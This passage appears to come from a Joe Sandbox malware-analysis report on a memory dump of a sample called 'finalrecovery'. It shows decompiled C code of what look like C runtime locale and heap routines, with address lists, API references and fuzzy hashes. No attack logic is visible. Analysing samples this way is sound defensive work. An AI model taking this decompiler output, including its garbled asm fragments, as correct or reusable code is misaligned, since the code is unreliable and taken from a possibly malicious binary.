									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L74:
											_t265 = _v460;
										} else {
											_t380 =  *_t425;
											_t266 =  &_v276;
											while(1) {
												__eflags =  *_t266 -  *_t380;
												_t429 = _v464;
												if( *_t266 !=  *_t380) {
													break;
												}
												__eflags =  *_t266;
												if( *_t266 == 0) {
													L67:
													_t379 = 0;
													_t267 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t266 + 2));
													__eflags = _t426 -  *((intOrPtr*)(_t380 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t380 + 2))) {
														break;
													} else {
														_t266 = _t266 + 4;
														_t380 = _t380 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t267;
												if(_t267 == 0) {
													_t365 = _t365 + 1;
													__eflags = _t365;
													goto L74;
												} else {
													_t268 =  &_v276;
													_push(_t268);
													_push(_t447);
													_push(_t429);
													L83();
													_t425 = _v452;
													_t468 = _t468 + 0xc;
													__eflags = _t268;
													if(_t268 == 0) {
														_t379 = 0;
														_t265 = 0;
														_v460 = 0;
													} else {
														_t365 = _t365 + 1;
														_t379 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t267 = _t266 | 0x00000001;
											_t379 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t265;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t365;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t259 = _t379;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t269 = E0042623B(_t445, 0x431664);
											_t367 = _t269;
											_v468 = _t367;
											_pop(_t382);
											__eflags = _t367;
											if(_t367 == 0) {
												break;
											}
											_t270 = _t269 - _t445;
											__eflags = _t270;
											_v460 = _t270 >> 1;
											if(_t270 == 0) {
												break;
											} else {
												_t272 = 0x3b;
												__eflags =  *_t367 - _t272;
												if( *_t367 == _t272) {
													break;
												} else {
													_t432 = _v460;
													_t368 = 0x4315ac;
													_v456 = 1;
													do {
														_t273 = E00416234( *_t368, _t445, _t432);
														_t467 = _t467 + 0xc;
														__eflags = _t273;
														if(_t273 != 0) {
															goto L45;
														} else {
															_t383 =  *_t368;
															_t424 = _t383 + 2;
															do {
																_t339 =  *_t383;
																_t383 = _t383 + 2;
																__eflags = _t339 - _v472;
															} while (_t339 != _v472);
															_t382 = _t383 - _t424 >> 1;
															__eflags = _t432 - _t383 - _t424 >> 1;
															if(_t432 != _t383 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t368 = _t368 + 0xc;
														__eflags = _t368 - 0x4315dc;
													} while (_t368 <= 0x4315dc);
													_t365 = _v468 + 2;
													_t274 = E004261E2(_t382, _t365, 0x43166c);
													_t429 = _v464;
													_t448 = _t274;
													_pop(_t386);
													__eflags = _t448;
													if(_t448 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t387 = _v452;
															goto L54;
														} else {
															_push(_t448);
															_t277 = E0042515D( &_v276, 0x83, _t365);
															_t469 = _t467 + 0x10;
															__eflags = _t277;
															if(_t277 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E004134C4();
																asm("int3");
																_push(_t461);
																_t462 = _t469;
																_t280 =  *0x43d054; // 0x8e1b5714
																_v560 = _t280 ^ _t462;
																_push(_t365);
																_t370 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t370;
																_v1284 = E0041CAE3(_t386, _t424) + 0x278;
																_t287 = E0041B567(_t370, _t424, _t433, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t471 = _t469 - 0x2e4 + 0x18;
																__eflags = _t287;
																if(_t287 == 0) {
																	L122:
																	_t288 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t103 = _t370 + 2; // 0x6
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t290 =  &_v280;
																	_v720 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t390 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t290 -  *_t390;
																		_t454 = _v720;
																		if( *_t290 !=  *_t390) {
																			break;
																		}
																		__eflags =  *_t290;
																		if( *_t290 == 0) {
																			L89:
																			_t291 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t290 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t390 + 2));
																			_v714 = _t459;
																			_t454 = _v720;
																			if(_t459 !=  *((intOrPtr*)(_t390 + 2))) {
																				break;
																			} else {
																				_t290 = _t290 + 4;
																				_t390 = _t390 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t291;
																		if(_t291 != 0) {
																			_t391 =  &_v280;
																			_t424 = _t391 + 2;
																			do {
																				_t292 =  *_t391;
																				_t391 = _t391 + 2;
																				__eflags = _t292 - _v712;
																			} while (_t292 != _v712);
																			_v716 = (_t391 - _t424 >> 1) + 1;
																			_t295 = E0041ECAF(4 + ((_t391 - _t424 >> 1) + 1) * 2);
																			_v732 = _t295;
																			__eflags = _t295;
																			if(_t295 == 0) {
																				goto L122;
																			} else {
																				_v728 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t370 * 4);
																				_v752 =  *(_t433 + 8);
																				_t398 =  &_v280;
																				_v736 = _t295 + 4;
																				_t297 = E00421411(_t295 + 4, _v716, _t398);
																				_t472 = _t471 + 0xc;
																				__eflags = _t297;
																				if(_t297 != 0) {
																					_t298 = _v712;
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					E004134C4();
																					asm("int3");
																					_push(_t462);
																					_push(_t398);
																					_v1336 = _v1336 & 0x00000000;
																					_t301 = E0041E7A1(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t301;
																					if(_t301 == 0) {
																						L132:
																						return 0xfde9;
																					}
																					_t303 = _v20;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L132;
																					}
																					return _t303;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v736;
																					if(_v280 != 0x43) {
																						L100:
																						_t306 = E0041B284(_t370, _t433,  &_v708);
																						_t424 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t424 = _v712;
																							_t306 = _t424;
																						}
																					}
																					 *(_t433 + 0xa0 + _t370 * 4) = _t306;
																					__eflags = _t370 - 2;
																					if(_t370 != 2) {
																						__eflags = _t370 - 1;
																						if(_t370 != 1) {
																							__eflags = _t370 - 5;
																							if(_t370 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v724;
																						}
																					} else {
																						_t458 = _v740;
																						 *(_t433 + 8) = _v724;
																						_v716 = _t458[8];
																						_t410 = _t458[9];
																						_v724 = _t410;
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *(_t458 + _t424 * 8);
																							if( *(_t433 + 8) ==  *(_t458 + _t424 * 8)) {
																								break;
																							}
																							_t334 =  *(_t458 + _t424 * 8);
																							_t410 =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _v724;
																							_t424 = _t424 + 1;
																							_t370 = _v744;
																							_v716 = _t334;
																							_v724 = _t410;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t326 = E004217F5(__eflags, _v712, 1, 0x431520, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t472 = _t472 + 0x1c;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									_t411 = _v712;
																								} else {
																									_t328 = _v712;
																									do {
																										 *(_t462 + _t328 * 2 - 0x20c) =  *(_t462 + _t328 * 2 - 0x20c) & 0x000001ff;
																										_t328 = _t328 + 1;
																										__eflags = _t328 - 0x7f;
																									} while (_t328 < 0x7f);
																									_t330 = E00410BDA( &_v536,  *0x43d1c4, 0xfe);
																									_t472 = _t472 + 0xc;
																									__eflags = _t330;
																									_t411 = 0 | _t330 == 0x00000000;
																								}
																								_t458[1] = _t411;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L120;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _t410;
																						}
																						goto L108;
																					}
																					L120:
																					_t307 = _t370 * 0xc;
																					_t204 = _t307 + 0x4315a8; // 0x40b1b0
																					 *0x42e234(_t433);
																					_t309 =  *((intOrPtr*)( *_t204))();
																					_t402 = _v728;
																					__eflags = _t309;
																					if(_t309 == 0) {
																						__eflags = _t402 - 0x43d290;
																						if(_t402 == 0x43d290) {
																							L127:
																							_t310 = _v720;
																						} else {
																							_t457 = _t370 + _t370;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L127;
																							} else {
																								E0041E238( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E0041E238( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E0041E238( *(_t433 + 0xa0 + _t370 * 4));
																								_t310 = _v720;
																								_t405 = _v712;
																								 *(_t310 + _t433) = _t405;
																								 *(_t433 + 0xa0 + _t370 * 4) = _t405;
																							}
																						}
																						_t403 = _v732;
																						 *_t403 = 1;
																						_t288 =  *(_t310 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t370 + _t370) * 8)) = _t403;
																					} else {
																						 *((intOrPtr*)(_v720 + _t433)) = _t402;
																						E0041E238( *(_t433 + 0xa0 + _t370 * 4));
																						 *(_t433 + 0xa0 + _t370 * 4) = _v748;
																						E0041E238(_v732);
																						 *(_t433 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t288 = _t424;
																			L123:
																			_pop(_t434);
																			_pop(_t450);
																			__eflags = _v16 ^ _t462;
																			_pop(_t371);
																			return E0040EB3F(_t288, _t371, _v16 ^ _t462, _t424, _t434, _t450);
																		}
																		goto L134;
																	}
																	asm("sbb eax, eax");
																	_t291 = _t290 | 0x00000001;
																	__eflags = _t291;
																	goto L91;
																}
															} else {
																_t335 = _t448 + _t448;
																__eflags = _t335 - 0x106;
																if(_t335 >= 0x106) {
																	E0040EC74();
																	goto L82;
																} else {
																	 *((short*)(_t461 + _t335 - 0x10c)) = 0;
																	_t337 =  &_v276;
																	_push(_t337);
																	_push(_v456);
																	_push(_t429);
																	L83();
																	_t387 = _v452;
																	_t467 = _t469 + 0xc;
																	__eflags = _t337;
																	if(_t337 != 0) {
																		_t387 = _t387 + 1;
																		_v452 = _t387;
																	}
																	L54:
																	_t445 = _t365 + _t448 * 2;
																	_t275 =  *_t445 & 0x0000ffff;
																	_t424 = _t275;
																	__eflags = _t275;
																	if(_t275 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t387;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t338 = 0x3b;
														__eflags =  *_t365 - _t338;
														if( *_t365 != _t338) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L134;
										}
										_t259 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t259 =  *(_t429 + (_t259 + 2 + _t259 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t259);
							_push(_t429);
							L83();
						}
						L80:
						_pop(_t430);
						_pop(_t446);
						__eflags = _v12 ^ _t461;
						_pop(_t366);
						return E0040EB3F(_t259, _t366, _v12 ^ _t461, _t424, _t430, _t446);
					}
				}
				L134:
			}

0x0041b9f1
0x0041b9f9
0x0041b9fa
0x0041ba03
0x0041ba0b
0x0041ba0d
0x0041ba0f
0x0041ba12
0x0041bb2f
0x0041bb32
0x0041ba18
0x0041ba18
0x0041ba19
0x0041ba1b
0x0041ba1b
0x0041ba1e
0x0041ba21
0x0041ba24
0x0041ba27
0x0041ba29
0x0041ba2c
0x0041ba31
0x0041ba3f
0x0041ba49
0x0041ba4c
0x0041ba4f
0x0041ba4f
0x0041ba5a
0x0041ba5f
0x0041ba64
0x00000000
0x0041ba6a
0x0041ba6d
0x0041ba6d
0x0041ba70
0x0041ba72
0x0041ba75
0x0041ba77
0x0041ba77
0x0041ba77
0x0041ba7a
0x0041ba7a
0x0041ba7a
0x0041ba80
0x00000000
0x00000000
0x0041ba85
0x0041ba9c
0x0041ba9c
0x0041ba87
0x0041ba87
0x0041ba8f
0x00000000
0x0041ba91
0x0041ba91
0x0041ba94
0x0041ba9a
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ba9a
0x0041ba8f
0x0041baa5
0x0041baa5
0x0041baaa
0x0041baaf
0x0041bab3
0x0041babf
0x0041bac2
0x0041bac5
0x0041bacf
0x0041bad7
0x0041badf
0x00000000
0x0041bae5
0x0041bae9
0x0041bb34
0x0041bb3d
0x0041bb40
0x0041bb42
0x0041bb46
0x0041bb4a
0x0041bb4f
0x0041bb54
0x0041bb4a
0x0041bb58
0x0041bb5a
0x0041bb5c
0x0041bb60
0x0041bb61
0x0041bb66
0x0041bb6b
0x0041bb61
0x0041bb6e
0x0041bb71
0x0041bb74
0x0041bb77
0x0041bb7a
0x0041baeb
0x0041baee
0x0041baf1
0x0041baf3
0x0041baf7
0x0041bafb
0x0041bb00
0x0041bb05
0x0041bafb
0x0041bb0b
0x0041bb0d
0x0041bb12
0x0041bb17
0x0041bb1c
0x0041bb12
0x0041bb1d
0x0041bb21
0x0041bb21
0x0041bb24
0x0041bb28
0x0041bb2b
0x0041bb2b
0x00000000
0x0041bb2e
0x00000000
0x0041badf
0x0041baa0
0x0041baa2
0x0041baa2
0x00000000
0x0041baa2
0x0041bb81
0x0041bb82
0x0041bb83
0x0041bb84
0x0041bb85
0x0041bb86
0x0041bb8b
0x0041bb8f
0x0041bb91
0x0041bb97
0x0041bb9e
0x0041bba1
0x0041bba4
0x0041bba5
0x0041bba6
0x0041bba9
0x0041bbaa
0x0041bbad
0x0041bbb3
0x0041bbb5
0x0041bbda
0x0041bbe4
0x0041bbea
0x0041bbec
0x0041bbf2
0x0041bbf4
0x0041be54
0x0041be55
0x00000000
0x0041bbfa
0x0041bbfa
0x0041bbfe
0x0041bd6c
0x0041bd89
0x0041bd8e
0x0041bd91
0x0041bd93
0x0041bd99
0x0041bd99
0x0041bd9b
0x0041bd9e
0x0041bda0
0x0041bda6
0x0041bda6
0x0041bda8
0x0041be2f
0x0041be2f
0x0041bdae
0x0041bdae
0x0041bdb0
0x0041bdb6
0x0041bdb9
0x0041bdbc
0x0041bdc2
0x00000000
0x00000000
0x0041bdc4
0x0041bdc8
0x0041bdf1
0x0041bdf1
0x0041bdf3
0x0041bdca
0x0041bdca
0x0041bdce
0x0041bdd2
0x0041bdd9
0x0041bddf
0x00000000
0x0041bde1
0x0041bde1
0x0041bde4
0x0041bde7
0x0041bdef
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bdef
0x0041bddf
0x0041bdfe
0x0041bdfe
0x0041be00
0x0041be2e
0x0041be2e
0x00000000
0x0041be02
0x0041be02
0x0041be08
0x0041be09
0x0041be0a
0x0041be0b
0x0041be10
0x0041be16
0x0041be19
0x0041be1b
0x0041be22
0x0041be24
0x0041be26
0x0041be1d
0x0041be1d
0x0041be1e
0x00000000
0x0041be1e
0x0041be1b
0x00000000
0x0041be00
0x0041bdf7
0x0041bdf9
0x0041bdfc
0x0041bdfc
0x00000000
0x0041bdfc
0x0041be35
0x0041be35
0x0041be36
0x0041be39
0x0041be3f
0x0041be3f
0x0041be48
0x0041be4a
0x00000000
0x0041be4c
0x0041be4c
0x0041be4e
0x00000000
0x0041be50
0x0041be50
0x0041be50
0x0041be4e
0x0041be4a
0x00000000
0x0041bc04
0x0041bc04
0x0041bc09
0x00000000
0x0041bc0f
0x0041bc0f
0x0041bc14
0x00000000
0x0041bc1a
0x0041bc1a
0x0041bc20
0x0041bc25
0x0041bc27
0x0041bc2e
0x0041bc2f
0x0041bc31
0x00000000
0x00000000
0x0041bc37
0x0041bc37
0x0041bc3b
0x0041bc41
0x00000000
0x0041bc47
0x0041bc49
0x0041bc4a
0x0041bc4d
0x00000000
0x0041bc53
0x0041bc53
0x0041bc59
0x0041bc5e
0x0041bc68
0x0041bc6c
0x0041bc71
0x0041bc74
0x0041bc76
0x00000000
0x0041bc78
0x0041bc78
0x0041bc7a
0x0041bc7d
0x0041bc7d
0x0041bc80
0x0041bc83
0x0041bc83
0x0041bc8e
0x0041bc90
0x0041bc92
0x00000000
0x00000000
0x0041bc92
0x00000000
0x0041bc94
0x0041bc94
0x0041bc9a
0x0041bc9d
0x0041bc9d
0x0041bcab
0x0041bcb4
0x0041bcb9
0x0041bcbf
0x0041bcc2
0x0041bcc3
0x0041bcc5
0x0041bcd3
0x0041bcd3
0x0041bcda
0x0041bd3b
0x00000000
0x0041bcdc
0x0041bcdc
0x0041bcea
0x0041bcef
0x0041bcf2
0x0041bcf4
0x0041be6f
0x0041be71
0x0041be72
0x0041be73
0x0041be74
0x0041be75
0x0041be76
0x0041be7b
0x0041be7e
0x0041be7f
0x0041be87
0x0041be8e
0x0041be91
0x0041be92
0x0041be95
0x0041be99
0x0041be9a
0x0041be9d
0x0041bead
0x0041bed0
0x0041bed5
0x0041bed8
0x0041beda
0x0041c190
0x0041c190
0x0041c190
0x00000000
0x0041bee0
0x0041bee0
0x0041bee3
0x0041bee3
0x0041bee6
0x0041beec
0x0041bef2
0x0041bef5
0x0041bef7
0x0041befa
0x0041bf01
0x0041bf04
0x0041bf0a
0x00000000
0x00000000
0x0041bf0c
0x0041bf10
0x0041bf39
0x0041bf39
0x0041bf12
0x0041bf12
0x0041bf16
0x0041bf1a
0x0041bf21
0x0041bf27
0x00000000
0x0041bf29
0x0041bf29
0x0041bf2c
0x0041bf2f
0x0041bf37
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bf37
0x0041bf27
0x0041bf46
0x0041bf46
0x0041bf48
0x0041bf51
0x0041bf57
0x0041bf5a
0x0041bf5a
0x0041bf5d
0x0041bf60
0x0041bf60
0x0041bf70
0x0041bf7e
0x0041bf83
0x0041bf8a
0x0041bf8c
0x00000000
0x0041bf92
0x0041bf98
0x0041bfa5
0x0041bfae
0x0041bfb4
0x0041bfc1
0x0041bfc8
0x0041bfcd
0x0041bfd0
0x0041bfd2
0x0041c210
0x0041c216
0x0041c217
0x0041c218
0x0041c219
0x0041c21a
0x0041c21b
0x0041c220
0x0041c223
0x0041c226
0x0041c227
0x0041c239
0x0041c23e
0x0041c240
0x0041c249
0x00000000
0x0041c249
0x0041c242
0x0041c245
0x0041c247
0x00000000
0x00000000
0x0041c24f
0x0041bfd8
0x0041bfd8
0x0041bfe6
0x0041bfe9
0x0041bfff
0x0041c006
0x0041c00b
0x0041bfeb
0x0041bfeb
0x0041bff3
0x00000000
0x0041bff5
0x0041bff5
0x0041bffb
0x0041bffb
0x0041bff3
0x0041c012
0x0041c019
0x0041c01c
0x0041c11a
0x0041c11d
0x0041c12a
0x0041c12d
0x0041c135
0x0041c135
0x0041c11f
0x0041c125
0x0041c125
0x0041c022
0x0041c022
0x0041c02e
0x0041c034
0x0041c03a
0x0041c03d
0x0041c043
0x0041c046
0x0041c049
0x00000000
0x00000000
0x0041c04b
0x0041c054
0x0041c058
0x0041c061
0x0041c065
0x0041c066
0x0041c06c
0x0041c072
0x0041c078
0x0041c07b
0x00000000
0x00000000
0x0041c07d
0x0041c09c
0x0041c09c
0x0041c09f
0x0041c0bc
0x0041c0c1
0x0041c0c4
0x0041c0c6
0x0041c104
0x0041c0c8
0x0041c0c8
0x0041c0ce
0x0041c0d3
0x0041c0db
0x0041c0dc
0x0041c0dc
0x0041c0f3
0x0041c0fa
0x0041c0fd
0x0041c0ff
0x0041c0ff
0x0041c10a
0x0041c110
0x0041c110
0x0041c115
0x00000000
0x0041c115
0x0041c07f
0x0041c081
0x0041c086
0x0041c08c
0x0041c095
0x0041c098
0x0041c098
0x00000000
0x0041c081
0x0041c138
0x0041c138
0x0041c13c
0x0041c144
0x0041c14a
0x0041c14d
0x0041c153
0x0041c155
0x0041c1a1
0x0041c1a7
0x0041c1f3
0x0041c1f3
0x0041c1a9
0x0041c1ae
0x0041c1ae
0x0041c1b4
0x0041c1b8
0x00000000
0x0041c1ba
0x0041c1be
0x0041c1c7
0x0041c1d3
0x0041c1d8
0x0041c1e1
0x0041c1e7
0x0041c1ea
0x0041c1ea
0x0041c1b8
0x0041c1f9
0x0041c201
0x0041c207
0x0041c20a
0x0041c157
0x0041c15d
0x0041c167
0x0041c179
0x0041c180
0x0041c18d
0x00000000
0x0041c18d
0x00000000
0x0041c155
0x0041bfd2
0x0041bf4a
0x0041bf4a
0x0041c192
0x0041c195
0x0041c196
0x0041c197
0x0041c199
0x0041c1a0
0x0041c1a0
0x00000000
0x0041bf48
0x0041bf41
0x0041bf43
0x0041bf43
0x00000000
0x0041bf43
0x0041bcfa
0x0041bcfa
0x0041bcfd
0x0041bd02
0x0041be6a
0x00000000
0x0041bd08
0x0041bd0a
0x0041bd12
0x0041bd18
0x0041bd19
0x0041bd1f
0x0041bd20
0x0041bd25
0x0041bd2b
0x0041bd2e
0x0041bd30
0x0041bd32
0x0041bd33
0x0041bd33
0x0041bd41
0x0041bd41
0x0041bd44
0x0041bd47
0x0041bd49
0x0041bd4c
0x0041bd4e
0x0041bd4e
0x0041bd51
0x0041bd51
0x0041bd54
0x0041bd57
0x00000000
0x0041bd5d
0x0041bd5d
0x0041bd5f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bd5f
0x0041bd57
0x0041bd02
0x0041bcf4
0x0041bcc7
0x0041bcc9
0x0041bcca
0x0041bccd
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bccd
0x0041bcc5
0x0041bc4d
0x00000000
0x0041bc41
0x0041bd65
0x00000000
0x0041bd65
0x0041bc14
0x0041bc09
0x0041bbfe
0x0041bbb7
0x0041bbb7
0x0041bbb9
0x0041bbd0
0x0041bbbb
0x0041bbbb
0x0041bbbc
0x0041bbbd
0x0041bbbe
0x0041bbc3
0x0041be5b
0x0041be5e
0x0041be5f
0x0041be60
0x0041be62
0x0041be69
0x0041be69
0x0041bbb5
0x00000000

APIs

Part of subcall function 0041ECAF: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF1B,?,?,?,?,?,00403757,?,?,?), ref: 0041ECE1

_free.LIBCMT ref: 0041BB00
_free.LIBCMT ref: 0041BB17
_free.LIBCMT ref: 0041BB34
_free.LIBCMT ref: 0041BB4F
_free.LIBCMT ref: 0041BB66

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 34f0736c7276f2d6119e6e6d336ab02ab079a344452ac571098f24c1785db25a
Instruction ID: 28a07f378302100051e42c83522a01624a1711d38e2cf2491471541673b0cfb2
Opcode Fuzzy Hash: 34f0736c7276f2d6119e6e6d336ab02ab079a344452ac571098f24c1785db25a
Instruction Fuzzy Hash: 6351C671A00704AFDB21DF6AD841BAA77F4EF48714F14456FE805D7690E739E981CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA70 Relevance: 7.6, APIs: 5, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040CA70(intOrPtr __edx, intOrPtr* _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				void* _v24;
				intOrPtr* _v28;
				char _v32;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				signed int _t37;
				intOrPtr _t42;
				signed int _t47;
				signed int _t48;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				char* _t54;
				intOrPtr _t59;
				signed int _t67;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				void* _t72;
				intOrPtr* _t73;
				signed int _t75;
				void* _t81;

				_t65 = __edx;
				_push(0xffffffff);
				_push(0x42cc24);
				_push( *[fs:0x0]);
				_t36 =  *0x43d054; // 0x8e1b5714
				_t37 = _t36 ^ _t75;
				_v20 = _t37;
				_push(_t37);
				 *[fs:0x0] =  &_v16;
				_t70 = _a4;
				_v28 = _t70;
				_t39 = E0040E023( &_v32, 0);
				_v8 = 0;
				_t67 =  *0x450e80; // 0x0
				_t50 =  *0x450d0c; // 0x0
				if(_t67 == 0) {
					E0040E023( &_v24, _t67);
					_t81 =  *0x450e80 - _t67; // 0x0
					if(_t81 == 0) {
						_t47 =  *0x450098; // 0x1
						_t48 = _t47 + 1;
						 *0x450098 = _t48;
						 *0x450e80 = _t48;
					}
					_t39 = E0040E07B( &_v24);
					_t67 =  *0x450e80; // 0x0
				}
				_t53 =  *((intOrPtr*)(_t70 + 4));
				if(_t67 >=  *((intOrPtr*)(_t53 + 0xc))) {
					_t71 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t39 =  *((intOrPtr*)(_t53 + 8));
					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 8)) + _t67 * 4));
					if(_t71 != 0) {
						L19:
						_t54 =  &_v32;
						asm("in al, 0xe8");
						asm("fst qword [eax+eax]");
						 *((intOrPtr*)(_t50 - 0xbb2743a)) =  *((intOrPtr*)(_t50 - 0xbb2743a)) + _t54;
						 *[fs:0x0] = _t54;
						_pop(_t68);
						_pop(_t72);
						_pop(_t51);
						return E0040EB3F(_t39, _t51, _v20 ^ _t75, _t65, _t68, _t72);
					}
					L8:
					if( *((char*)(_t53 + 0x14)) == 0) {
						L11:
						if(_t71 != 0) {
							goto L19;
						}
						L12:
						if(_t50 == 0) {
							_t73 = E0040ED4F(_t50, _t67, _t71, __eflags, 8);
							_v24 = _t73;
							_v8 = 1;
							_t22 = _v28 + 4; // 0xe0458b04
							_t59 =  *_t22;
							__eflags = _t59;
							if(_t59 == 0) {
								_t42 = 0x4399f7;
							} else {
								_t42 =  *((intOrPtr*)(_t59 + 0x18));
								__eflags = _t42;
								if(_t42 == 0) {
									_t24 = _t59 + 0x1c; // 0xe0458b20
									_t42 = _t24;
								}
							}
							E00403F10(_t42);
							 *((intOrPtr*)(_t73 + 4)) = 0;
							 *_t73 = 0x42ef14;
							E00403FC0( &_v84);
							_v28 = _t73;
							_v8 = 2;
							E0040E1D4(__eflags, _t73);
							_t65 =  *_t73;
							_t39 =  *((intOrPtr*)( *_t73 + 4))();
							 *0x450d0c = _t73;
						}
						goto L19;
					}
					_t39 = E0040E200();
					if(_t67 >=  *((intOrPtr*)(_t39 + 0xc))) {
						goto L12;
					}
					_t71 =  *((intOrPtr*)(_t39 + _t67 * 4));
					goto L11;
				}
			}

0x0040ca70
0x0040ca73
0x0040ca75
0x0040ca80
0x0040ca84
0x0040ca89
0x0040ca8b
0x0040ca91
0x0040ca95
0x0040ca9b
0x0040caa3
0x0040caa6
0x0040caab
0x0040cab2
0x0040cab8
0x0040cac0
0x0040cac6
0x0040cacb
0x0040cad1
0x0040cad3
0x0040cad8
0x0040cad9
0x0040cade
0x0040cade
0x0040cae6
0x0040caeb
0x0040caeb
0x0040caf1
0x0040caf7
0x0040cb09
0x0040cb09
0x00000000
0x0040caf9
0x0040caf9
0x0040cafc
0x0040cb01
0x0040cb96
0x0040cb96
0x0040cb98
0x0040cb9a
0x0040cb9d
0x0040cba3
0x0040cbab
0x0040cbac
0x0040cbad
0x0040cbbb
0x0040cbbb
0x0040cb0b
0x0040cb0f
0x0040cb21
0x0040cb23
0x00000000
0x00000000
0x0040cb25
0x0040cb27
0x0040cb34
0x0040cb39
0x0040cb3c
0x0040cb43
0x0040cb43
0x0040cb46
0x0040cb48
0x0040cb56
0x0040cb4a
0x0040cb4a
0x0040cb4d
0x0040cb4f
0x0040cb51
0x0040cb51
0x0040cb51
0x0040cb4f
0x0040cb5f
0x0040cb67
0x0040cb6e
0x0040cb74
0x0040cb79
0x0040cb7d
0x0040cb81
0x0040cb86
0x0040cb8d
0x0040cb90
0x0040cb90
0x00000000
0x0040cb27
0x0040cb11
0x0040cb19
0x00000000
0x00000000
0x0040cb1e
0x00000000
0x0040cb1e

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040CAA6
std::_Lockit::_Lockit.LIBCPMT ref: 0040CAC6
